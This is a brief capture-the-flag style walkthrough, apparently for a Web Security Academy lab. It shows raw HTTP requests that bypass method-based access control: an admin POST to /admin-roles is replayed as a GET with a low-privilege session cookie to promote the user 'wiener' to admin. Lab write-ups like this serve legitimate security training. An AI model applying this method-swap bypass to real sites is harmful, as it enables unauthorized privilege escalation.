Method-based access control can be circumvented
POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=XsqrYt4o8QomLoJpncRksvEPlLoTtdAP
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
...
username=carlos&action=upgradeGET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: ****.web-security-academy.net
Cookie: session=poV8GzZZIcBjp6JlAvpWXdUR6f5p1LDq
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"PreviousURL-based access control can be circumventedNextMulti-step process with no access control on one step
Last updated